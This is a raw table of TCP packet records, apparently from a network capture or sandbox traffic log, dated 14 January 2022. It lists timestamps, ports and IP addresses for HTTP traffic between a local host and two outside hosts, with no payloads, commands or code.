Jan 14, 2022 00:15:57.442992926 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443013906 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443032026 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443073034 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443111897 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443136930 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443150997 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443171024 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443191051 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443231106 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443268061 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443281889 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443308115 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443329096 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443346977 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443384886 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443423986 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443439960 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443463087 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443478107 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443506002 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443547010 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443583965 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443598986 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443624973 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443644047 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443664074 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443701029 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443739891 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443753004 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443779945 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443793058 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443820000 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443861961 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443898916 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.443921089 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.443957090 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.445641041 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.445694923 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.445734024 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.445774078 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.445789099 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.445827007 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494239092 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494293928 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494333982 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494373083 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494411945 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494452000 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494456053 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494484901 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494492054 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494529963 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494549036 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494570017 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494584084 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494611025 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494651079 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494690895 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494704962 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494729996 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494743109 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494770050 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494812965 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494851112 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494863987 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494890928 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494905949 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.494931936 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.494970083 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495008945 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495028019 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495048046 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495065928 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495102882 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495143890 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495182037 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495197058 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495223045 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495235920 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495268106 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495306015 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495345116 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495357990 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495383978 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495398045 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495429039 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495460033 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495490074 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495517015 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495529890 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495552063 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495568991 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495609045 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495646954 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495651007 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495688915 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495709896 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495728970 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495769024 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495809078 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495825052 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495848894 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495862961 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.495887041 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495925903 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495965004 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.495979071 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.496016979 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.496056080 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.496098995 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.496138096 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.496176958 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.496190071 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.496228933 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547308922 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547375917 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547394991 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547434092 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547475100 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547498941 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547514915 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547528028 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547555923 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547596931 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547615051 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547633886 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547653913 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547666073 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547712088 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547750950 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547758102 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547790051 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547804117 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547830105 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547871113 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547883987 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.547910929 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547950029 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.547990084 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548003912 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548029900 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548046112 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548073053 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548111916 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548151016 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548163891 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548191071 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548203945 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548237085 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548274040 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548314095 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548326015 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548356056 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548363924 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548393965 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548434973 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548471928 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548487902 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548511028 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548527002 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548549891 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548588037 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548619986 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548626900 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548677921 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548693895 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548700094 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548757076 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548763990 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548794985 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548835039 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548849106 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548875093 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548912048 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548952103 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.548965931 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.548989058 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549002886 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549029112 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549071074 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549108982 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549123049 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549149036 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549159050 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549190044 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549227953 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549268961 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549283981 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549309015 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549323082 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549349070 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549388885 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549426079 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549427032 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549468040 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549482107 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549508095 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549545050 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549583912 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549598932 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549623966 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549633980 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549666882 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549707890 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549746037 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549760103 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549787045 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549798012 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549828053 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549895048 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549928904 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:57.549964905 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.549994946 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.558307886 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.559185982 CET	49884	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:57.609834909 CET	80	49884	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.375713110 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.426819086 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.426913023 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.427027941 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.427227020 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.477273941 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.477394104 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.505959034 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.506058931 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.506114960 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.506232023 CET	49885	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.543332100 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.558556080 CET	80	49885	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.597349882 CET	80	49886	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.597795010 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.598021030 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.598052979 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.650254965 CET	80	49886	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.681646109 CET	80	49886	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.681726933 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.681987047 CET	49886	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:59.733711004 CET	80	49886	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:59.775619030 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.853290081 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.853411913 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.853514910 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.931194067 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931507111 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931586981 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931655884 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931703091 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.931704998 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931746006 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931775093 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.931786060 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931828022 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931864977 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931883097 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.931905031 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931943893 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:15:59.931957960 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:15:59.931989908 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.009727001 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.009785891 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.009825945 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.009900093 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.009942055 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.009979010 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010018110 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010057926 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010094881 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010133982 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010174990 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010212898 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010252953 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010293007 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010333061 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010373116 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010410070 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010448933 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010487080 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.010970116 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097157955 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097213984 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097253084 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097315073 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097372055 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097388983 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097430944 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097455978 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097491980 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097503901 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097549915 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097610950 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097616911 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097668886 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097727060 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097728968 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097783089 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097841024 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097842932 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.097934961 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.097990990 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098007917 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098047018 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098102093 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098104000 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098154068 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098198891 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098217010 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098237991 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098278046 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098294020 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098318100 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098356009 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098371983 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098396063 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098433018 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098450899 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098473072 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098511934 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098527908 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098550081 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098589897 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098611116 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098627090 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098670959 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098681927 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098731041 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098777056 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098790884 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098818064 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098855972 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098872900 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.098905087 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098923922 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.098953009 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.099179029 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.176676035 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.176748037 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.176809072 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.176822901 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.176870108 CET	80	49887	141.8.194.74	192.168.2.4
